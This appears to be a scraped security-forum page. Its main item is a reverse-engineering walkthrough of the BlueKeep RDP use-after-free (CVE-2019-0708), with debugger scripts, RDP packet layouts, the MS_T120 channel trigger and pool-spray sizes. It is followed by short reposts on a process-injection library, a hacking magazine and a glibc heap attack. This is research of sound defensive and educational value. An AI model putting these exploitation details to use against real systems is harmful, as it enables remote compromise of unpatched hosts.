ICAAPI!IcaStackOpen+0xa4 00000000`06d0f710 000007fe`f7dbc015 ICAAPI!IcaStackOpen+0x83 00000000`06d0f760 000007fe`f7dbd2f9 rdpcorekmts!CStack::CStack+0x189 00000000`06d0f7c0 000007fe`f7dc04bd rdpcorekmts!CKMRDPConnection::InitializeInstance+0x21d 00000000`06d0f830 000007fe`f7dbb58a rdpcorekmts!CKMRDPConnection::Listen+0xf9 00000000`06d0f8d0 000007fe`f7dba8ea rdpcorekmts!CKMRDPListener::ListenThreadWorker+0xae 00000000`06d0f910 00000000`7755652d rdpcorekmts!CKMRDPListener::staticListenThread+0x12 00000000`06d0f940 00000000`777ec521 kernel32!BaseThreadInitThunk+0xd 00000000`06d0f970 00000000`00000000 ntdll!RtlUserThreadStart+0x1d We had seen that the previous call to the driver had been generated here image2019-7-1_13-36-4.png When that call ends an instance of the class Cstack is created image2019-7-1_13-37-32.png And the class constructor is called. image2019-7-1_13-38-2.png this matches the current call stack fffff880`05c146a0 fffff880`03c96748 termdd!IcaCreate+0x36 fffff880`05c146f0 fffff800`02b95b35 termdd!IcaDispatch+0x2d4 fffff880`05c14730 fffff800`02b923d8 nt!IopParseDevice+0x5a5 fffff880`05c148c0 fffff800`02b935f6 nt!ObpLookupObjectName+0x588 fffff880`05c149b0 fffff800`02b94efc nt!ObOpenObjectByName+0x306 fffff880`05c14a80 fffff800`02b9fb54 nt!IopCreateFile+0x2bc fffff880`05c14b20 fffff800`0289b253 nt!NtCreateFile+0x78 fffff880`05c14bb0 00000000`7781186a nt!KiSystemServiceCopyEnd+0x13 00000000`06d0f618 000007fe`f95014b2 ntdll!NtCreateFile+0xa 00000000`06d0f620 000007fe`f95018c9 ICAAPI!IcaOpen+0xa6 00000000`06d0f6e0 000007fe`f95017e8 ICAAPI!IcaStackOpen+0xa4 00000000`06d0f710 000007fe`f7dbc015 ICAAPI!IcaStackOpen+0x83 00000000`06d0f760 000007fe`f7dbd2f9 rdpcorekmts!CStack::CStack+0x189 00000000`06d0f7c0 000007fe`f7dc04bd rdpcorekmts!CKMRDPConnection::InitializeInstance+0x21d 00000000`06d0f830 000007fe`f7dbb58a rdpcorekmts!CKMRDPConnection::Listen+0xf9 00000000`06d0f8d0 000007fe`f7dba8ea rdpcorekmts!CKMRDPListener::ListenThreadWorker+0xae 00000000`06d0f910 00000000`7755652d rdpcorekmts!CKMRDPListener::staticListenThread+0x12 00000000`06d0f940 00000000`777ec521 kernel32!BaseThreadInitThunk+0xd 00000000`06d0f970 00000000`00000000 ntdll!RtlUserThreadStart+0x1d The highlighted text is the same for both calls, the difference is the red line and the upper lines 00000000`06d0f7c0 000007fe`f7dc04bd rdpcorekmts!CKMRDPConnection::InitializeInstance+0x1da image2019-7-1_13-41-16.png The second call returns to 00000000`06d0f7c0 000007fe`f7dc04bd rdpcorekmts!CKMRDPConnection::InitializeInstance+0x21d image2019-7-1_13-42-34.png And this second call continues to image2019-7-1_13-43-46.png Next image2019-7-1_13-45-3.png Next image2019-7-1_14-20-48.png We arrived to _IcaOpen, calling ntCreafile for the second time, but now Buffer is a chunk in user allocated with a size different than zero, its size is 0x36. image2019-7-1_13-46-58.png This second call reaches IcaDispath and IcaCreate in similar way to the first call. But now SystemBuffer is different than zero, I suppose that SystemBuffer is created, if the buffer size is different to zero.(in the first call buffer=0 → SystemBuffer=0 now buffer!=0 → SystemBuffer is !=0). SystemBuffer is stored in _IRP.AssociatedIrp.SystemBuffer here image2019-7-2_6-33-41.png in the decompiled code image2019-7-2_6-49-1.png Previously IRP is moved to r12 image2019-7-2_6-34-34.png = image2019-7-1_13-50-29.png That address is accessed many times over there, so the only way to stop when it is nonzero is to use a conditional breakpoint. image2019-7-2_7-50-54.png image2019-7-2_8-36-51.png The first time that RAX is different from zero it stops before the second call to CREATE, and if I continue executing, I reach IcaCreate with that new value of SystemBuffer. image2019-7-2_7-57-25.png We arrived at this code, the variable named "contador" is zero, for this reason, we landed in IcaCreateStack. image2019-7-2_8-18-25.png In IcaCreateStack a new fragment of size 0xBA8 is allocated, I call it chunk_stack_0xBA8. image2019-7-2_8-21-24.png I comment the conditional breakpoint part, to avoid stopping and only keep logging. image2019-7-2_8-44-4.png I repeat the process to get a new fresh log. image2019-7-2_8-43-25.png Summarizing by just executing this two lines of code to create a connection, and even without sending data, we have access to the driver The most relevent part of the log when connecting is this. image2019-7-5_7-41-1.png IcaCreate was called two times, with MajorFunction = 0x0. The first call allocates CHUNK_CONNECTION, the second call allocates chunk_stack_0xBA8. We will begin to reverse the data that it receives, for it would be convenient to be able to use Wireshark to analyze the data, although as the connection is encrypted with SSL, in Wireshark we could only see that the encrypted data which does not help us much. image2019-7-10_7-17-40.png The data travels encrypted and thus the Wireshark receives it, but we will try to use it all the same. For this purpose we need to detect the point where the program begins to parse data already decrypted. image2019-7-10_7-21-1.png The driver rdpwd.sys is in charge of starting to parse the data already decrypted. The important point for us is in the function MCSIcaRawInputWorker, where the program started to parse the decrypted code. image2019-7-10_7-23-32.png STEP 2) Put some conditional breakpoints in IDA PRO to dump to a file the data decrypted The idea is place a conditional breakpoint in that point, so that each time the execution passes there, it will save the data it has already decrypted in a file, then use that file and load it in Wireshark. image2019-7-10_7-40-29.png This will analyze the module rdpwd.sys and I can find its functions in IDA, debugging from my database of termdd.sys, when it stops at any breakpoint of this driver. image2019-7-10_7-44-21.png image2019-7-10_7-44-42.png I already found the important point: if the module rdpwd.sys changes its location by ASLR, I will have to repeat these steps to relocate the breakpoint correctly. address = 0xFFFFF880034675E8 filename=r"C:\Users\ricardo\Desktop\pepe.txt" size=0x40 out=open(filename, "wb" dbgr =True data = GetManyBytes(address, size, use_dbg=dbgr) out.write(data) out.close() This script saves in a file the bytes pointed by variable "address", the amount saved will be given by the variable "size", and saves it in a file on my desktop, I will adapt it to read the address and size from the registers at the point of breakpoint. address=cpu.r12 size=cpu.rbp filename=r"C:\Users\ricardo\Desktop\pepe.txt" out=open(filename, "ab") dbgr =True data = GetManyBytes(address, size, use_dbg=dbgr) out.write(data) image2019-7-10_8-21-26.png This will dump the bytes perfectly to the file. image2019-7-10_8-16-31.png I will use this script in the conditional breakpoint. image2019-7-10_8-25-48.png This script made a raw dump, but wireshark only imports in this format. image2019-7-10_8-52-4.png address=cpu.r12 size=cpu.rbp filename=r"C:\Users\ricardo\Desktop\pepe.txt" out=open(filename, "ab") dbgr =True data = GetManyBytes(address, size, use_dbg=dbgr) str="" for i in data: str+= "%02x "%ord(i) out.write(str) in Windows 7 32 bits version this is the important point where the decrypted code is parsed, and we can use this script to dump to a file. image2019-7-25_7-4-49.png Windows 7 32 script address=cpu.eax size=cpu.ebx filename=r"C:\Users\ricardo\Desktop\pepefff.txt" out=open(filename, "ab") dbgr =True data = GetManyBytes(address, size, use_dbg=dbgr) str="" for i in data: str+= "%02x "%ord(i) out.write(str) Windows XP 32 bits script address=cpu.eax size=cpu.edi filename=r"C:\Users\ricardo\Desktop\pepefff.txt" out=open(filename, "ab") dbgr =True data = GetManyBytes(address, size, use_dbg=dbgr) str="" for i in data: str+= "%02x "%ord(i) out.write(str) This is the similar point in Windows XP. image2019-7-29_9-7-42.png image2019-7-29_9-9-50.png STEP 3) Importing to Wireshark This script will save the bytes in the format that wireshark will understand. When I I"Import from hex dump", I will use the port "3389/tcp" : "msrdp" image2019-7-10_9-39-29.png We load our dump file and put the destination port as 3389, the source port is not important. I add a rule to decode port 3389 as TPKT image2019-7-10_10-5-44.png image2019-7-10_9-43-3.png That file will be decoded as TPKT in wireshark. That's the complete script. image2019-7-10_10-30-53.png Using that script, the dump file is created, when it is imported as a hexadecimal file in Wireshark, it is displayed perfectly. image2019-8-7_13-3-46.png This work can be done also by importing the SSL private key in wireshark, but I like to do it in the most manual way, old school type. STEP 4) More reversing We are ready to receive and analyze our first package, but first we must complete and analyze some more tasks that the program performs after what we saw before receiving the first package of our data. We can see that there are a few more calls before starting to receive data, a couple more calls to the driver. image2019-7-11_7-40-17.png The part marked in red is what we have left to analyze from the first connection without sending data. I will modify the conditional breakpoint to stop at the first MajorFunction = 0xE. image2019-7-11_7-50-23.png It will stop when MajorFunction = 0xE image2019-7-11_7-54-22.png We arrived at IcaDeviceControl. image2019-7-11_7-55-47.png We can see that this call is generated when the program accepts the connection, calling ZwDeviceIoControlFile next. image2019-7-11_8-16-31.png We can see that IRP and IO_STACK_LOCATION are maintained with the same value, fileobject has changed. image2019-7-11_8-34-49.png We will leave the previous structure called FILE_OBJECT for the previous call, and we will make a copy with the original fields called FILE_OBJECT_2, to be used in this call. image2019-7-11_8-40-35.png The previous FILE_OBJECT was an object that was obtained from ObReferenceObjectByHandle. image2019-7-11_8-51-20.png The new FILE_OBJECT has the same structure but is a different object, for that reason we create a new structure for this. image2019-7-11_11-16-45.png We continue reversing ProbeAndCaptureUserBuffers image2019-7-11_11-50-29.png A new chunk with the size (InputBufferLenght + OutputBufferLenght) is created. image2019-7-11_11-47-15.png Stores the pointers to the Input and Output buffers chunks. image2019-7-11_11-51-8.png We can see that IcaUserProbeAddress is similar to nt! MmUserProbeAddress value image2019-7-12_6-36-39.png That's used to verify whether a user-specified address resides within user-mode memory areas, or not. If the address is lower than IcaUserProbeAddress resides in User mode memory areas, and a second check is performed to ensure than the InputUserBuffer + InputBufferLenght address is bigger than InputUserBuffer address.(size not negative) image2019-7-12_7-9-41.png Then the data is copied from the InputUserBuffer to the chunk_Input_Buffer that has just allocated for this purpose. We can see the data that the program copies from InputUserBuffer, it's not data that we send yet. image2019-7-12_7-11-34.png Since the OutputBufferLength is zero, it will not copy from OutputUserBuffer to the chunk_OutputBuffer. image2019-7-12_7-13-47.png Clears chunk_OutputBuffer and return. image2019-7-12_7-17-41.png Returning from ProbeAndCaptureUserBuffers, we can see that this function copies the input and output buffer of the user mode memory to the new chunks allocated in the kernel memory, for the handling of said data by the driver image2019-7-12_7-21-55.png The variable "resource" points to IcaStackDispatchTable. image2019-7-12_7-37-14.png I frame the area of the table and create a structure from memory which I call _IcaStackDispatchTable. image2019-7-12_7-45-56.png image2019-7-12_7-43-49.png I entered and started to reverse this function. image2019-7-12_8-28-20.png The first time we arrived here, the IOCTL value is 38002b. image2019-7-12_8-44-11.png We arrived to a call to _IcaPushStack. image2019-7-12_9-10-25.png Inside two allocations are performed, i named them chunk_PUSH_STACK_0x488 and chunk_PUSH_STACK_0xA8 image2019-7-12_11-43-51.png When IOCTL value 0x38002b is used, we reach _IcaLoadSd image2019-7-12_11-57-33.png We can see the complete log of the calls to the driver with different IOCTL only in the connection without sending data yet. IO_STACK_LOCATION 0xfffffa80061bea90L IRP 0xfffffa80061be9c0L chunk_CONNECTION 0xfffffa8006223510L IO_STACK_LOCATION 0xfffffa80061bea90L IRP 0xfffffa80061be9c0L FILE_OBJECT 0xfffffa8004231860L chunk_stack_0xBA8 0xfffffa80068d63d0L FILE_OBJECT_2 0xfffffa80063307b0L IOCTL 0x380047L FILE_OBJECT_2 0xfffffa8006335ae0L IOCTL 0x38002bL chunk_PUSH_STACK_0x488 0xfffffa8006922a20L chunk_PUSH_STACK_0xa8 0xfffffa8005ce0570L FILE_OBJECT_2 0xfffffa8006335ae0L IOCTL 0x38002bL chunk_PUSH_STACK_0x488 0xfffffa8005f234e0L chunk_PUSH_STACK_0xa8 0xfffffa8006875ba0L FILE_OBJECT_2 0xfffffa8006335ae0L IOCTL 0x38002bL chunk_PUSH_STACK_0x488 0xfffffa8005daf010L chunk_PUSH_STACK_0xa8 0xfffffa8006324c40L FILE_OBJECT_2 0xfffffa8006335ae0L IOCTL 0x38003bL FILE_OBJECT_2 0xfffffa8006335ae0L IOCTL 0x3800c7L FILE_OBJECT_2 0xfffffa8006335ae0L IOCTL 0x38244fL FILE_OBJECT_2 0xfffffa8006335ae0L IOCTL 0x38016fL FILE_OBJECT_2 0xfffffa8006335ae0L IOCTL 0x380173L FILE_OBJECT_2 0xfffffa8006334c90L FILE_OBJECT_2 0xfffffa8006335ae0L IOCTL 0x38004bL IO_STACK_LOCATION 0xfffffa8004ceb9d0L IRP 0xfffffa8004ceb900L FILE_OBJECT 0xfffffa8006334c90L chunk_channel 0xfffffa8006923240L guarda RDI DESTINATION 0xfffffa8006923240L FILE_OBJECT_2 0xfffffa8006335ae0L IOCTL 0x381403L FILE_OBJECT_2 0xfffffa8006335ae0L IOCTL 0x380148L I will put conditional breakpoints in each different IOCTL, to list the functions where each one ends up. The IOCTLs 0x380047, 0x38003b, 0x3800c7, 0x38244f, 0x38016f, 0x38004b, 0x381403 end in _IcaCallStack image2019-7-15_8-12-31.png These IOCTLs also reach _IcaCallSd image2019-7-15_8-13-6.png IOCTL 0x380148 does nothing IOCTL 0x380173 reaches _IcaDriverThread image2019-7-15_8-28-38.png And this last one reaches tdtcp_TdInputThread also. image2019-7-15_8-30-27.png This function is used to receive the data sended by the user. STEP 5) Receiving data If we continue running to the point of data entry breakpoint, we can see in the call stack that it comes from tdtcp! TdInputThread. image2019-7-15_8-57-57.png The server is ready now, and waiting for our first send. We will analyze the packages and next we will return to the reversing. STEP 6) Analyzing Packets Negotiate Request package 03 00 00 13 0e e0 00 00 00 00 00 01 00 08 00 01 00 00 00 Step 6.png Requested Protocol image2019-7-15_10-28-28.png Negotiation Response package The Response package was similar only with Type=0x2 RDP Negotiation Response image2019-7-15_10-37-35.png Connect Initial Package The package starts with "\x03\x00\xFF\xFF\x02\xf0\x80" #\xFF\xFF are sizes to be calculated and smashed at the end Header 03 -> TPKT: TPKT version = 3 00 -> TPKT: Reserved = 0 FF -> TPKT: Packet length - high part FF -> TPKT: Packet length - low part X.224 02 -> X.224: Length indicator = 2 f0 -> X.224: Type = 0xf0 = Data TPDU 80 -> X.224: EOT PDU "7f 65" .. -- BER: Application-Defined Type = APPLICATION 101, "82 FF FF" .. -- BER: Type Length = will be calculated and smashed at the end in the Dos sample will be 0x1b2 "04 01 01" .. -- Connect-Initial::callingDomainSelector "04 01 01" .. -- Connect-Initial::calledDomainSelector "01 01 ff" .. -- Connect-Initial::upwardFlag = TRUE "30 19" .. -- Connect-Initial::targetParameters (25 bytes) "02 01 22" .. -- DomainParameters::maxChannelIds = 34 "02 01 02" .. -- DomainParameters::maxUserIds = 2 "02 01 00" .. -- DomainParameters::maxTokenIds = 0 "02 01 01" .. -- DomainParameters::numPriorities = 1 "02 01 00" .. -- DomainParameters::minThroughput = 0 "02 01 01" .. -- DomainParameters::maxHeight = 1 "02 02 ff ff" .. -- DomainParameters::maxMCSPDUsize = 65535 "02 01 02" .. -- DomainParameters::protocolVersion = 2 "30 19" .. -- Connect-Initial::minimumParameters (25 bytes) "02 01 01" .. -- DomainParameters::maxChannelIds = 1 "02 01 01" .. -- DomainParameters::maxUserIds = 1 "02 01 01" .. -- DomainParameters::maxTokenIds = 1 "02 01 01" .. -- DomainParameters::numPriorities = 1 "02 01 00" .. -- DomainParameters::minThroughput = 0 "02 01 01" .. -- DomainParameters::maxHeight = 1 "02 02 04 20" .. -- DomainParameters::maxMCSPDUsize = 1056 "02 01 02" .. -- DomainParameters::protocolVersion = 2 "30 1c" .. -- Connect-Initial::maximumParameters (28 bytes) "02 02 ff ff" .. -- DomainParameters::maxChannelIds = 65535 "02 02 fc 17" .. -- DomainParameters::maxUserIds = 64535 "02 02 ff ff" .. -- DomainParameters::maxTokenIds = 65535 "02 01 01" .. -- DomainParameters::numPriorities = 1 "02 01 00" .. -- DomainParameters::minThroughput = 0 "02 01 01" .. -- DomainParameters::maxHeight = 1 "02 02 ff ff" .. -- DomainParameters::maxMCSPDUsize = 65535 "02 01 02" .. -- DomainParameters::protocolVersion = 2 "04 82 FF FF" .. -- Connect-Initial::userData (calculated at the end in the DoS example will be 0x151 bytes) "00 05" .. -- object length = 5 bytes "00 14 7c 00 01" .. -- object "81 48" .. -- ConnectData::connectPDU length = 0x48 bytes "00 08 00 10 00 01 c0 00 44 75 63 61" .. -- PER encoded (ALIGNED variant of BASIC-PER) GCC Conference Create Request PDU "81 FF" .. -- UserData::value length (calculated at the end in the DoS example will be 0x13a bytes) #------------- "01 c0 ea 00" .. -- TS_UD_HEADER::type = CS_CORE (0xc001), length = 0xea bytes "04 00 08 00" .. -- TS_UD_CS_CORE::version = 0x0008004 "00 05" .. -- TS_UD_CS_CORE::desktopWidth = 1280 "20 03" .. -- TS_UD_CS_CORE::desktopHeight = 1024 "01 ca" .. -- TS_UD_CS_CORE::colorDepth = RNS_UD_COLOR_8BPP (0xca01) "03 aa" .. -- TS_UD_CS_CORE::SASSequence "09 04 00 00" .. -- TS_UD_CS_CORE::keyboardLayout = 0x409 = 1033 = English (US) "28 0a 00 00" .. -- TS_UD_CS_CORE::clientBuild = 2600 "45 00 4d 00 50 00 2d 00 4c 00 41 00 50 00 2d 00 " .. "30 00 30 00 31 00 34 00 00 00 00 00 00 00 00 00 " .. -- TS_UD_CS_CORE::clientName = EMP-LAP-0014 "04 00 00 00" .. -- TS_UD_CS_CORE::keyboardType "00 00 00 00" .. -- TS_UD_CS_CORE::keyboardSubtype "0c 00 00 00" .. -- TS_UD_CS_CORE::keyboardFunctionKey "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " .. "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " .. "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " .. "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " .. -- TS_UD_CS_CORE::imeFileName = "" "01 ca" .. -- TS_UD_CS_CORE::postBeta2ColorDepth = RNS_UD_COLOR_8BPP (0xca01) "01 00" .. -- TS_UD_CS_CORE::clientProductId "00 00 00 00" .. -- TS_UD_CS_CORE::serialNumber "18 00" .. -- TS_UD_CS_CORE::highColorDepth = 24 bpp "07 00" .. -- TS_UD_CS_CORE::supportedColorDepths = 24 bpp "01 00" .. -- TS_UD_CS_CORE::earlyCapabilityFlags "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " .. "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " .. "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " .. "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 " .. -- TS_UD_CS_CORE::clientDigProductId 07 -> TS_UD_CS_CORE::connectionType = 7 00 -> TS_UD_CS_CORE::pad1octet 01 00 00 00 -> TS_UD_CS_CORE::serverSelectedProtocol #--------------- 04 c0 0c 00 -> TS_UD_HEADER::type = CS_CLUSTER (0xc004), length = 12 bytes "15 00 00 00" .. -- TS_UD_CS_CLUSTER::Flags = 0x15 f (REDIRECTION_SUPPORTED | REDIRECTION_VERSION3) "00 00 00 00" .. -- TS_UD_CS_CLUSTER::RedirectedSessionID #------------ "02 c0 0c 00" -- TS_UD_HEADER::type = CS_SECURITY (0xc002), length = 12 bytes "1b 00 00 00" .. -- TS_UD_CS_SEC::encryptionMethods "00 00 00 00" .. -- TS_UD_CS_SEC::extEncryptionMethods "03 c0 38 00" .. -- TS_UD_HEADER::type = CS_NET (0xc003), length = 0x38 bytes In this package we need to set the user channels, and a MS_T120 channel needs to be included in the list. Erect Domain Package domain package1.png image2019-7-15_11-25-10.png 0x04: type ErectDomainRequest 0x01: subHeight length = 1 byte 0x00 : subHeight = 0 0x01: subInterval length = 1 byte 0x00: subInterval = 0 User Attach Packet package image2019-7-15_13-17-26.png image2019-7-15_13-25-21.png We need to analyze the response. 03 00 00 0b 02 f0 80 2e 00 00 07 image2019-7-15_13-42-33.png The last byte is the initiator, we need to strip from the response to use in the next packet. Channel Join request package Building the package xv1 = (chan_num) / 256 val = (chan_num) % 256 '\x03\x00\x00\x0c\x02\xf0\x80\x38\x00' + initiator + chr(xv1) + chr(val) For channel 1003 by example xv1 = (1003) / 256 = 3 val = (1003) % 256 = 235 '\x03\x00\x00\x0c\x02\xf0\x80\x38\x00' + initiator + chr(3) + chr(235) image2019-7-15_14-26-0.png image2019-7-15_14-31-39.png 0x38: channelJoinRequest (14) image2019-7-16_7-39-52.png All channel join packages are similar, the only thing that changes are the last two bytes that correspond to the channel number. Channel Join Confirm Response package The response was 03 00 00 0f 02 f0 80 3e 00 00 07 03 eb 03 eb 0x3e:channelJoinConfirm (15) image2019-7-16_8-1-54.png result: rt_succesful (0x0) The packet has the same initiator and channelid values than the request to the same channel. When all the channels response the Join Request, the next package sended is send Data Request. image2019-7-22_11-46-44.png Client Info PDU or Send Data Request Package image2019-7-22_11-48-45.png The remaining packages are important for the exploitation, so for now we will not show them in this first delivery. STEP 7) The vulnerability The program allocate a channel MS_T120 by default, the user can set different channels in the packages. This is the diff of the function named IcabindVirtualChannels image2019-8-6_12-3-44.png This is the patch for the Windows XP version, which its logic is similar for every vulnerable windows version, when the program compares the string MS_T120 with the name of each channel, the pointer is forced to be stored in a fixed position of the table, forcing to use the value 0x1f to calculate the place to save it . In the vulnerable version, the pointer is stored using the channel number to calculate the position in the channel table, and we will have two pointers stored in different locations, pointing to the same chunk. If the user set a channel MS_T120 and send crafted data to that channel, the program will allocate a chunk for that, but will store two different pointers to that chunk, after that the program frees the chunk, but the data of the freed chunk is incorrectly accessed, performing a USE AFTER FREE vulnerability. The chunk is freed here image2019-8-6_13-50-59.png Then the chunk is accessed after the free here, EBX will point to the freed chunk. image2019-8-6_13-51-59.png If a perfect pool spray is performed, using the correct chunk size, we can control the execution flow, the value of EAX controlled by us, EBX point to our chunk, EAX =[EBX+0x8c] is controlled by us too. image2019-8-6_13-55-45.png STEP 😎 Pool spray There is a point in the code that let us allocate our data with size controlled, and the same type of pool. image2019-8-6_14-2-16.png We can send bunch of crafted packages to reach this point, if this packages have the right size can fill the freed chunk, with our data. In order to get the right size is necessary look at the function IcaAllocateChannel. In Windows 7 32 bits, the size of each chunk of the pool spray should be 0xc8. image2019-8-6_14-7-12.png For Windows XP 32 bits that size should be 0x8c. image2019-8-6_14-8-47.png This pool spray remain in this loop allocating with the right size, and we can fill the freed chunk with our own data to control the code execution in the CALL (IcaChannelInputInternal + 0x118) Be happy Ricardo Narvaja Sursa: https://www.coresecurity.com/blog/low-level-reversing-bluekeep-vulnerability-cve-2019-0708?code=CMP-0000001929&ls=100000000&utm_campaign=core-security-emails&utm_content=98375609&utm_medium=social&utm_source=twitter&hss_channel=tw-17157238
    1 point
  12. Pinjectra Pinjectra is a C/C++ library that implements Process Injection techniques (with focus on Windows 10 64-bit) in a "mix and match" style. Here's an example: // CreateRemoteThread Demo + DLL Load (i.e., LoadLibraryA as Entry Point) executor = new CodeViaCreateRemoteThread( new OpenProcess_VirtualAllocEx_WriteProcessMemory( (void *)"MsgBoxOnProcessAttach.dll", 25, PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE), LoadLibraryA ); executor->inject(pid, tid); It's also currently the only implementation of the "Stack Bomber" technique. A new process injection technique that is working on Windows 10 64-bit with both CFG and CIG enabled. Pinjectra, and "Stack Bomber" technique released as part of the Process Injection Techniques - Gotta Catch Them All talk given at BlackHat USA 2019 conference and DEF CON 27 by Itzik Kotler and Amit Klein from SafeBreach Labs. Version 0.1.0 License BSD 3-Clause Sursa: https://github.com/SafeBreach-Labs/pinjectra
    1 point
  13. What is Paged Out!? Paged Out! is a new experimental (one article == one page) free magazine about programming (especially programming tricks!), hacking, security hacking, retro computers, modern computers, electronics, demoscene, and other similar topics. It's made by the community for the community - the project is led by Gynvael Coldwind with multiple folks helping. And it's not-for-profit (though in time we hope it will be self-sustained) - this means that the issues will always be free to download, share and print. If you're interested in more details, check our our FAQ and About pages! Download Issues Cover art by ReFiend. Issue #1: The first Paged Out! issue has arrived! Paged Out! #1 (web PDF) (12MB) Wallpaper (PNG, 30% transparency) (13MB) Wallpaper (PNG, 10% transparency) (13MB) Note: This is a "beta build" of the PDF, i.e. we will be re-publishing it with compatibility/size/menu/layout improvements multiple times in the next days. We'll also publish soon: PDFs for printing (A4+bleed, US Letter+bleed) - our scripts don't build them yet. Next issue If you like our work, how about writing an article for Paged Out!? It's only one page after all - easy. Next issue progress tracker (unit of measurement: article count): (article submission deadline for Issue #2 is 20 Oct 2019) Ready (0) In review (9) 50 100 ("we got enough to finalize the issue!" zone) Call For Articles for Issue #2! Cover art by Vlad Gradobyk (Insta, FB). Notify me when the new issue is out! Sure! There are a couple of ways to get notified when the issue will be out: You can subscribe to this newsletter e-mail group: pagedout-notifications (googlegroups.com) (be sure to select you want e-mail notifications about every message when subscribing). Or you can use the RSS / Atom for that group: "about" page with links to RSS / Atom We will only send e-mails to this group about new Paged Out! issues (both the free electronic ones and special issues if we ever get to that). No spam will be sent there and (if you subscribe to the group) your e-mail will be visible only to group owners. Sursa: https://pagedout.institute/?page=issues.php
    1 point
  14. Linux Heap House of Force Exploitation August 10, 2019 In this paper, I introduce the reader to a heap metadata corruption against a recent version of the Linux Heap allocator in glibc 2.27. The House of Force attack is a known technique that requires a buffer overflow to overwrite the top chunk size. An attacker must then be able to malloc an arbitrary size of memory. The result is that it is possible to make a later malloc return an arbitrary pointer. With appropriate application logic, this attack can be used in exploitation. This attack has been mitigated in the latest glibc 2.29 but is still exploitable in glibc 2.27 as seen in Ubuntu 18.04 LTS. Linux Heap House of Force Exploitation.PDF Sursa: http://blog.infosectcbr.com.au/2019/08/linux-heap-house-of-force-exploitation.html
    1 point
×
×
  • Create New...